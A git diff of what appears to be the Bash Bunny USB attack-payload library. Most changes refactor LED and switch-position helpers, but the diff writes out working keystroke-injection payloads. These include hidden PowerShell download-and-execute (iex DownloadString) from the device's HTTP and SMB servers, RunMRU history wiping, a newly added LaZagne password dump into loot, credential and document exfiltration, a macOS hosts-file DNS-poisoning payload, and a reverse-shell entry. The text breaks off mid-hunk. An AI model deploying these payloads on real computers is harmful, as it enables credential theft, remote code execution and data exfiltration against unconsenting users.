('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\"" # Remove tracks in the psh payload if you wish -# Attack Ethernet +# STAGE 2 - WAIT LED STAGE2 - -while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do +while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do sleep .5 done diff --git a/payloads/library/execution/psh_DownloadExec/readme.md b/payloads/library/execution/psh_DownloadExec/readme.md index 5d96fd13..12d4ca8d 100644 --- a/payloads/library/execution/psh_DownloadExec/readme.md +++ b/payloads/library/execution/psh_DownloadExec/readme.md @@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve ## Configuration -Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed. +Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed. ## Requirements @@ -31,5 +31,5 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info | Attack Stage | Description | | ------------------- | ---------------------------------------- | | Stage 1 | Running Initial Powershell Commands | -| Stage 3 | Delivering powershell payload | -``` \ No newline at end of file +| Stage 2 | Delivering powershell payload | +``` diff --git a/payloads/library/execution/psh_DownloadExec/psh.txt b/payloads/library/execution/psh_DownloadExecSMB/p.txt old mode 100644 new mode 100755 similarity index 99% rename from payloads/library/execution/psh_DownloadExec/psh.txt rename to payloads/library/execution/psh_DownloadExecSMB/p.txt index ea23a0dd..71720880 --- a/payloads/library/execution/psh_DownloadExec/psh.txt +++ b/payloads/library/execution/psh_DownloadExecSMB/p.txt @@ -1,3 +1,2 @@ New-Item $ENV:UserProfile\Desktop\SUCCESS -ItemType file Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue - diff --git a/payloads/library/execution/psh_DownloadExecSMB/payload.txt b/payloads/library/execution/psh_DownloadExecSMB/payload.txt index b05f2e2d..3a2592f4 100644 --- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt +++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt @@ -2,23 +2,23 @@ # # Title: Powershell Download and Execute SMB # Author: LowValueTarget -# Version: 1.2 +# Version: 2.0 # Category: Powershell # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, RNDIS_ETHERNET # Firmware: >= 1.2 # -# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot. -# Ensure psh.txt exists in payload directory +# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless! +# Credentials captured by are stored as loot. +# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) # -# Requires Impacket is installed (python ./impacket/setup.py install) +# Required tools: impacket # # | Attack Stage | Description | # | ------------------- | ------------------------------| # | Stage 1 | Powershell | # | Stage 2 | Delivering powershell payload | # - ATTACKMODE RNDIS_ETHERNET HID # SETUP @@ -29,48 +29,48 @@ GET SWITCH_POSITION GET TARGET_HOSTNAME GET HOST_IP +# DEFINE DIRECTORIES PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION -# Check for psh.txt -if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then +LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB + +mkdir -p /tmp/{l,p} + +# CHECK FOR POWERSHELL +if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then LED FAIL exit 1 fi -cp -R ${PAYLOAD_DIR}/* /tmp/ +cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp -LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB -# Setup named logs in loot directory -mkdir -p ${LOOTDIR} +# GET HOSTNAME HOST=${TARGET_HOSTNAME} -# If hostname is blank set it to "noname" -[[ -z "$HOST" ]] && HOST="noname" -COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l) +[[ -z "${HOST}" ]] && HOST="noname" +COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l) COUNT=$((COUNT+1)) -mkdir -p ${LOOTDIR}/${HOST}-$COUNT +mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT} +LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT} -# Log file -LOGFILE=psh_smb.log +# START SMB SERVER +LOGFILE=/tmp/l/psh_downloadsmb.log +touch ${LOGFILE} +python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} & -# Start SMB Server -mkdir -p /loot -python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} & - -# STAGE 1 - Powershell +# STAGE 1 - POWERSHELL LED STAGE1 +RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\"" +# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot +# TIP: Remove tracks in the psh payload if you wish -RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\"" -# Remove tracks in the psh payload if you wish - -# STAGE 2 - Wait until payload retrieved -# Wait until payload is retrieved +# STAGE 2 - HURRY UP AND WAIT LED STAGE2 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done # CLEANUP LED CLEANUP -# Move loot to mass storage -mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT -rm /loot/${LOGFILE} +# STASH THE LOOT +mv /tmp/l/* ${LOOTDIR_BB}/ +rm -rf /tmp/{l,p} # Sync file system sync diff --git a/payloads/library/execution/psh_DownloadExecSMB/readme.md b/payloads/library/execution/psh_DownloadExecSMB/readme.md index 42c29490..644b3d3c 100644 --- a/payloads/library/execution/psh_DownloadExecSMB/readme.md +++ b/payloads/library/execution/psh_DownloadExecSMB/readme.md @@ -10,16 +10,20 @@ ## Description -Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot. +Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot. ## Configuration -* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed. -* Requires Impacket is installed (python ./impacket/setup.py install) +* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed. +* Requires Impacket + +__Installation__ + +See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/ ## STATUS | Attack Stage | Description | | ------------------- | ------------------------------| | Stage 1 | Powershell | -| Stage 2 | Delivering powershell payload | \ No newline at end of file +| Stage 2 | Delivering powershell payload | diff --git a/payloads/library/exfiltration/BlackBackup/payload.txt b/payloads/library/exfiltration/BlackBackup/payload.txt index e7a8f9a6..640b687d 100644 --- a/payloads/library/exfiltration/BlackBackup/payload.txt +++ b/payloads/library/exfiltration/BlackBackup/payload.txt @@ -2,7 +2,7 @@ # Author: JWHeuver & JBaselier # Version: 1.0 # -# Runs powershell script to get Wlan and logon credentials +# Runs powershell script to get Wlan and logon credentials # from computer and save them on USB drive (Storage attack) # # Purple.............Loading @@ -14,19 +14,18 @@ # OPTIONS - More options available in the Powershell payload OBFUSCATECMD="N" # Y=yes or N=no -# Source bunny_helpers.sh to get environment variable and switch_positions -source bunny_helpers.sh - #----------------------------------- # Purple LED - initializing -LED R B 0 +LED SETUP + +GET SWITCH_POSITION # Attackmode HID / Storage ATTACKMODE HID STORAGE #----------------------------------- # Green LED - executing credential_powershell -LED G 0 +LED STAGE1 QUACK GUI r QUACK DELAY 300 @@ -57,4 +56,4 @@ QUACK ENTER #----------------------------------- # Kill the lights - finished -LED 0 +LED FINISH diff --git a/payloads/library/exfiltration/FileInfoExfil/payload.txt b/payloads/library/exfiltration/FileInfoExfil/payload.txt index e7e08bfa..b0854cf4 100644 --- a/payloads/library/exfiltration/FileInfoExfil/payload.txt +++ b/payloads/library/exfiltration/FileInfoExfil/payload.txt @@ -11,49 +11,40 @@ # Purple LED..................Script Started # Yellow LED..................Ducky Script Started # Red LED.....................Failed to run Ducky Script, see log file -# +# # NOTE: p.ps1 MUST be in loot/payloads/ for this to work. # -LED B R +LED SETUP + +GET SWITCH_POSITION ATTACKMODE HID STORAGE - - -# Set language -QUACK SET_LANGUAGE gb - - -# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned -source bunny_helpers.sh - - - if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then - -#Call ducky script -LED R G - +#Call ducky script +LED STAGE1 + + QUACK ${SWITCH_POSITION}/ducky_script.txt - - + + QUACK DELAY 10000 -LED R G B +LED FINISH else - - -LED R - + + +LED FAIL + #Red LED if unable to load script echo "Unable to load ducky_script.txt" >> /root/debuglog.txt - - + + exit 1 diff --git a/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt b/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt index b0ccbae6..b5553363 100644 --- a/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt +++ b/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt @@ -4,18 +4,18 @@ # Author: $irLurk$alot # Version: 1.0 # Target: Windows -# +# # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn runs powershell script to copy move and extract data. -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh +LED SETUP + +GET SWITCH_POSITION -LED R 100 ATTACKMODE HID STORAGE QUACK GUI r QUACK DELAY 100 -LED R B 100 +LED ATTACK QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" QUACK ENTER -LED R G B +LED FINISH diff --git a/payloads/library/exfiltration/ftp_exfiltrator/payload.txt b/payloads/library/exfiltration/ftp_exfiltrator/payload.txt index eff48232..f2bc2b59 100644 --- a/payloads/library/exfiltration/ftp_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/ftp_exfiltrator/payload.txt @@ -4,7 +4,7 @@ # Author: Nutt # Version: 1.0 # Target: Windows -# +# #Exfiltrates files from the users Documents folder #FTP's all files/folders to a specified FTP site named by the victim hostname. #Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site. @@ -15,13 +15,12 @@ #Red............Failed - Need to work on #Green..........Finished -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -LED R B +LED SETUP +GET SWITCH_POSITION ATTACKMODE HID STORAGE QUACK GUI r QUACK DELAY 1000 +LED ATTACK QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')" QUACK ENTER -LED G \ No newline at end of file +LED FINISH diff --git a/payloads/library/exfiltration/usb_exfiltrator/e.cmd b/payloads/library/exfiltration/usb_exfiltrator/e.cmd index 4e9db02b..9bc85762 100644 --- a/payloads/library/exfiltration/usb_exfiltrator/e.cmd +++ b/payloads/library/exfiltration/usb_exfiltrator/e.cmd @@ -6,6 +6,14 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious + +REM This executes LaZagne in the current directory and outputs the password file to Loot +REM Time and Date is also added +setlocal +cd /d %~dp0 +%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" + +REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul @@ -19,11 +27,12 @@ REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories -xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul +REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul + ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls -@exit \ No newline at end of file +@exit diff --git a/payloads/library/exfiltration/usb_exfiltrator/payload.txt b/payloads/library/exfiltration/usb_exfiltrator/payload.txt index 8df6290e..44f50d59 100644 --- a/payloads/library/exfiltration/usb_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/usb_exfiltrator/payload.txt @@ -6,12 +6,12 @@ # Target: Windows XP SP3+ # Props: Diggster, IMcPwn # Category: Exfiltration -# +# # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs # which in turn copies documents to the loot folder on the Bash Bunny. # - +GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" diff --git a/payloads/library/general/ExecutableInstaller/payload.txt b/payloads/library/general/ExecutableInstaller/payload.txt index 61ef2373..60521e82 100644 --- a/payloads/library/general/ExecutableInstaller/payload.txt +++ b/payloads/library/general/ExecutableInstaller/payload.txt @@ -4,22 +4,19 @@ # Author: IMcPwn # Version: 1.0 # Target: Windows 7+ -# +# # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs # which in turn copies payload.exe from the root of the Bash Bunny and then executes it # using the --startup parameter. Change these settings inside of e.cmd. # -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -LED R +LED SETUP +GET SWITCH_POSITION +LED ATTACK ATTACKMODE HID STORAGE QUACK GUI r QUACK DELAY 100 QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" QUACK ENTER - -# Green LED for finished -LED G +LED FINISH diff --git a/payloads/library/general/Proxy_Interceptor/payload.txt b/payloads/library/general/Proxy_Interceptor/payload.txt index b5e180f9..0b72fd42 100644 --- a/payloads/library/general/Proxy_Interceptor/payload.txt +++ b/payloads/library/general/Proxy_Interceptor/payload.txt @@ -19,10 +19,12 @@ LED R 50 #Set ATTACKMODE to HID and Storage to be able to transfer the certificate ATTACKMODE HID STORAGE -#Import Bunny Helpers -source bunny_helpers.sh -#Start of Script +LED SETUP +GET SWITCH_POSITION + +LED ATTACK +#Start of Script Q DELAY 6000 Q GUI r Q DELAY 100 @@ -39,6 +41,7 @@ Q STRING cd \$absPath Q ENTER Q DELAY 500 +LED ATTACK #Set the proxy in the internet settings in the registry (For IE and Chrome). Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')" Q ENTER @@ -62,4 +65,4 @@ Q DELAY 500 Q STRING EXIT Q ENTER sync -LED R B 100 +LED FINISH diff --git a/payloads/library/general/Windows NIC Sharing/p.ps1 b/payloads/library/general/Windows_NIC_Sharing/p.ps1 similarity index 100% rename from payloads/library/general/Windows NIC Sharing/p.ps1 rename to payloads/library/general/Windows_NIC_Sharing/p.ps1 diff --git a/payloads/library/general/Windows NIC Sharing/payload.txt b/payloads/library/general/Windows_NIC_Sharing/payload.txt similarity index 92% rename from payloads/library/general/Windows NIC Sharing/payload.txt rename to payloads/library/general/Windows_NIC_Sharing/payload.txt index bf19038b..16fdd574 100644 --- a/payloads/library/general/Windows NIC Sharing/payload.txt +++ b/payloads/library/general/Windows_NIC_Sharing/payload.txt @@ -23,7 +23,7 @@ # Sharing is caring # Right-Click Ineternet interface click on # "Properties" and select "Sharing" tab -# +# # From "Sharing" tab check # "Allow other netwrk usrs 2 connect... thru dis connection" # Select the Bash Bunny Gadget and hit "OK" @@ -34,9 +34,11 @@ # Set the IPv4=172.16.64.64 and Subnet=24-bit # Hit all the OKs +GET SWITCH_POSITION + # Or we could just have the Bash Bunny do all the work... LED SETUP -SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION +SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION) # HID Attack Starts ATTACKMODE HID diff --git a/payloads/library/general/Windows NIC Sharing/readme.md b/payloads/library/general/Windows_NIC_Sharing/readme.md similarity index 100% rename from payloads/library/general/Windows NIC Sharing/readme.md rename to payloads/library/general/Windows_NIC_Sharing/readme.md diff --git a/payloads/library/general/Windows NIC Sharing/server.py b/payloads/library/general/Windows_NIC_Sharing/server.py similarity index 100% rename from payloads/library/general/Windows NIC Sharing/server.py rename to payloads/library/general/Windows_NIC_Sharing/server.py diff --git a/payloads/library/phishing/dns_poisoning_mac/README.md b/payloads/library/phishing/dns_poisoning_mac/README.md new file mode 100644 index 00000000..351bd0b7 --- /dev/null +++ b/payloads/library/phishing/dns_poisoning_mac/README.md @@ -0,0 +1,9 @@ +# DNS Poisoning Attack Mac + +## Description + +Redirects a domain to a set IP adres by changing the hosts file. + +## Configuration + +Change the domain you want to redirect and the IP you want to direct it to. diff --git a/payloads/library/phishing/dns_poisoning_mac/payload.txt b/payloads/library/phishing/dns_poisoning_mac/payload.txt new file mode 100644 index 00000000..5bc7f7b8 --- /dev/null +++ b/payloads/library/phishing/dns_poisoning_mac/payload.txt @@ -0,0 +1,23 @@ +#Title: DNS Poisoning Mac +#Description: Attacks the host file to redirect a website of your chosing for a given domain +#Author: thehappydinoa +#Target: OS X + +LED R 200 + +ATTACKMODE HID +LED STAGE1 +Q DELAY 400 +Q GUI SPACE +Q DELAY 300 +Q STRING terminal +Q DELAY 200 +Q ENTER +Q DELAY 400 +Q STRING 'echo 10.1.1.0 test.com>>/etc/hosts' +Q DELAY 50 +Q ENTER +Q STRING exit +Q ENTER + +LED FINISH diff --git a/payloads/library/prank/RickRoll/payload.txt b/payloads/library/prank/RickRoll/payload.txt index 75ad5c49..106f9e0e 100644 --- a/payloads/library/prank/RickRoll/payload.txt +++ b/payloads/library/prank/RickRoll/payload.txt @@ -1,34 +1,37 @@ -#!/bin/bash -# -# Title: RickRoll Prank -# Author: illwill -# Version: 0.1 -# -# -# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes -# Blue...............Running Powershell / Waiting for WebServer to start -# White..............WebServer started starting the rickroll -# Green..............RickRoll Started, Safe to pull - - -LED B 200 -ATTACKMODE HID -Q GUI r -Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\"" -Q DELAY 300 -Q ENTER - - -ATTACKMODE RNDIS_ETHERNET -source bunny_helpers.sh -payload_dir=/root/udisk/payloads/$SWITCH_POSITION -cd $payload_dir -LED R G B 200 -iptables -A OUTPUT -p udp --dport 53 -j DROP -python -m SimpleHTTPServer 80 & -pid=$! -while ! nc -z localhost 80; do sleep 0.2; done -sleep 3 -LED G 200 -kill -9 $pid -exit +#!/bin/bash +# +# Title: RickRoll Prank +# Author: illwill +# Version: 0.1 +# +# +# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes +# Blue...............Running Powershell / Waiting for WebServer to start +# White..............WebServer started starting the rickroll +# Green..............RickRoll Started, Safe to pull + + +LED SETUP +GET SWITCH_POSITION + +LED STAGE1 +ATTACKMODE HID +Q GUI r +Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\"" +Q DELAY 300 +Q ENTER + +LED STAGE2 +ATTACKMODE RNDIS_ETHERNET +payload_dir=/root/udisk/payloads/$SWITCH_POSITION +cd $payload_dir +LED ATTACK +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & +pid=$! +while ! nc -z localhost 80; do sleep 0.2; done +sleep 3 + +LED FINISH +kill -9 $pid +exit \ No newline at end of file diff --git a/payloads/library/prank/macDesktop/macWallpaper.sh b/payloads/library/prank/macDesktop/macWallpaper.sh index bc858985..d691c4aa 100755 --- a/payloads/library/prank/macDesktop/macWallpaper.sh +++ b/payloads/library/prank/macDesktop/macWallpaper.sh @@ -1,25 +1,26 @@ pid=$$ touch /tmp/$pid +cd /tmp/ for (( i=0; i < 5; ++i )) do if [ ! -e /tmp/1.jpg ]; then - wget "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg" -O "/tmp/1.jpg"; + curl -0 1.jpg "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg"; fi if [ ! -e /tmp/2.jpg ]; then - wget "http://wallpapersafari.com/download/rzbCmJ/" -O "/tmp/2.jpg"; + curl -0 2.jpg "http://wallpapersafari.com/download/rzbCmJ/"; fi if [ ! -e /tmp/3.jpg ]; then - wget "https://images3.alphacoders.com/152/152507.jpg" -O "/tmp/3.jpg"; + curl -0 3.jpg "https://images3.alphacoders.com/152/152507.jpg"; fi if [ ! -e /tmp/4.jpg ]; then - wget "https://images3.alphacoders.com/152/152475.jpg" -O "/tmp/4.jpg"; + curl -0 4.jpg "https://images3.alphacoders.com/152/152475.jpg"; fi if [ ! -e /tmp/5.jpg ]; then - wget "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png" -O "/tmp/5.jpg"; + curl -0 5.jpg "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png"; fi let number="$RANDOM % 5 + 1 | bc" @@ -31,7 +32,7 @@ do killall Dock let time="$RANDOM % 18000 + 2700 | bc" echo $time - sleep $time + sleep $time done rm /tmp/1.jpg /tmp/2.jpg /tmp/3.jpg /tmp/4.jpg /tmp/5.jpg /tmp/$pid diff --git a/payloads/library/prank/win93/payload.txt b/payloads/library/prank/win93/payload.txt index e5d35a1c..ef141979 100644 --- a/payloads/library/prank/win93/payload.txt +++ b/payloads/library/prank/win93/payload.txt @@ -78,7 +78,6 @@ if [ "$OS" = "MAC" ]; then RUN OSX "terminal" QUACK STRING "open \"http://www.windows93.net\" && osascript -e \"sleep 3;ccf;\";" elif [ "$OS" = "LINUX" ]; then - DUCKY_LANG fr RUN UNITY "xterm" QUACK STRING "chromium-browser --start-fullscreen --incognito --new-window http://www.windows93.net &; exit;" QUACK ENTER diff --git a/payloads/library/recon/InfoGrabber/payload.txt b/payloads/library/recon/InfoGrabber/payload.txt index aad67e3c..5a67261f 100644 --- a/payloads/library/recon/InfoGrabber/payload.txt +++ b/payloads/library/recon/InfoGrabber/payload.txt @@ -5,39 +5,19 @@ # Version: 1.0 # Target: Windows # Creds: Hak5Darren for inspiration -# +# # Executes run.ps1 which executes scripts that gets you information about # the computer running and will also get wifi passwords -LED R B 100 +LED SETUP ATTACKMODE HID STORAGE +GET SWITCH_POSITION -#Check swith copied from bunny_helper - -check_switch() { - switch1=`cat /sys/class/gpio_sw/PA8/data` - switch2=`cat /sys/class/gpio_sw/PL4/data` - switch3=`cat /sys/class/gpio_sw/PL3/data` - if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then - SWITCH_POSITION="switch1" - elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then - SWITCH_POSITION="switch2" - elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then - SWITCH_POSITION="switch3" - else - SWITCH_POSITION="invalid" - fi -} - -check_switch - -# Set your language here -QUACK SET_LANGUAGE no +LED ATTACK QUACK GUI r QUACK DELAY 200 # Open run and run the run.ps1 script in the Bashbunny QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" QUACK ENTER -LED G -#Green means good to go +LED FINISH diff --git a/payloads/library/recon/Link File analysis/payload.txt b/payloads/library/recon/Link File analysis/payload.txt deleted file mode 100644 index 2af8f84c..00000000 --- a/payloads/library/recon/Link File analysis/payload.txt +++ /dev/null @@ -1,12 +0,0 @@ - - - -LED R B 100 -ATTACKMODE HID STORAGE - - -DUCKY_LANG gb -LED B -RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" -LED G FAST -#Green means good to go diff --git a/payloads/library/Incident_Response/Link File analysis/payload.txt b/payloads/library/recon/Link_File_analysis/payload.txt similarity index 65% rename from payloads/library/Incident_Response/Link File analysis/payload.txt rename to payloads/library/recon/Link_File_analysis/payload.txt index 2af8f84c..14525305 100644 --- a/payloads/library/Incident_Response/Link File analysis/payload.txt +++ b/payloads/library/recon/Link_File_analysis/payload.txt @@ -1,12 +1,7 @@ - - - -LED R B 100 +LED SETUP ATTACKMODE HID STORAGE +GET SWITCH_POSITION - -DUCKY_LANG gb -LED B +LED ATTACK RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" -LED G FAST -#Green means good to go +LED FINISH diff --git a/payloads/library/recon/Link File analysis/readme.md b/payloads/library/recon/Link_File_analysis/readme.md similarity index 100% rename from payloads/library/recon/Link File analysis/readme.md rename to payloads/library/recon/Link_File_analysis/readme.md diff --git a/payloads/library/recon/Link File analysis/run.ps1 b/payloads/library/recon/Link_File_analysis/run.ps1 similarity index 100% rename from payloads/library/recon/Link File analysis/run.ps1 rename to payloads/library/recon/Link_File_analysis/run.ps1 diff --git a/payloads/library/recon/PrivEscChecker/payload.txt b/payloads/library/recon/PrivEscChecker/payload.txt index 88dc1b85..3b80e7c1 100644 --- a/payloads/library/recon/PrivEscChecker/payload.txt +++ b/payloads/library/recon/PrivEscChecker/payload.txt @@ -15,10 +15,8 @@ # Green..............Found Possible Privilege Escalation # Red................No Possible Privilege Escalation -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -LED R 200 +LED SETUP +GET SWITCH_POSITION LOOTDIR=/root/udisk/loot/PrivEscChecker mkdir -p $LOOTDIR #cleanup any prior unfinished payloads @@ -26,7 +24,7 @@ rm $LOOTDIR/DONE rm $LOOTDIR/OUTPUT ATTACKMODE HID STORAGE -LED B 200 +LED ATTACK # wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter Q DELAY 6000 @@ -57,7 +55,7 @@ Q STRING New-Item \$Bunny\\loot\\PrivEscChecker\\DONE -type file -force -value \ Q ENTER Q DELAY 100 -# Eject the USB Safely +# Eject the USB Safely Q STRING \$Eject \= New-Object -comObject Shell.Application Q ENTER Q DELAY 100 @@ -68,7 +66,7 @@ Q ENTER sync #remount the drive and check results -LED R B 200 +LED CLEANUP sleep 1 # Wait for the DONE file to be created so we know powershell is finished LOOTDIR=/root/udisk/loot/PrivEscChecker @@ -84,7 +82,7 @@ rm -f $DONEFILE # Check OUTPUT.txt for any missing patches if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then - LED G 200 -else - LED R -fi \ No newline at end of file + LED FINISH +else + LED FAIL +fi diff --git a/payloads/library/remote_access/LinuxReverseShell/payload.txt b/payloads/library/remote_access/LinuxReverseShell/payload.txt index 9a2b985c..3125ae15 100644 --- a/payloads/library/remote_access/LinuxReverseShell/payload.txt +++ b/payloads/library/remote_access/LinuxReverseShell/payload.txt @@ -17,6 +17,9 @@ RPORT=4444 # Start Setup LED SETUP +# Gets Switch Position +GET SWITCH_POSITION + # Set Attack Mode ATTACKMODE HID STORAGE diff --git a/payloads/library/remote_access/NothingLess/payload.txt b/payloads/library/remote_access/NothingLess/payload.txt index 097a6e50..b41869fb 100644 --- a/payloads/library/remote_access/NothingLess/payload.txt +++ b/payloads/library/remote_access/NothingLess/payload.txt @@ -4,18 +4,18 @@ # Author: StinkyBliss # Version: 1.0 # Target: Windows -# -# +# +# # Maps the file system and stores it in c:\users\tempa # Shares a location to everyone and grants full security permissions to everyone -# +# # For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions # To share a drive change the path in nl.cmd to c: remove the quotes -LED R 200 +LED SETUP +GET SWITCH_POSITION -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh +LED STAGE1 ATTACKMODE HID @@ -30,12 +30,12 @@ Q DELAY 1000 Q LEFT Q ENTER -LED R G 200 +LED STAGE2 ATTACKMODE HID STORAGE # Start nl.cmd -Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\nl.cmd')" +Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\${SWITCH_POSITION}\nl.cmd')" Q ENTER # Wait for nl.cmd and exit @@ -45,4 +45,4 @@ Q ENTER sync -LED G \ No newline at end of file +LED FINISH diff --git a/payloads/library/remote_access/USB_Intruder/payload.txt b/payloads/library/remote_access/USB_Intruder/payload.txt index ccf2d5eb..5adf51da 100644 --- 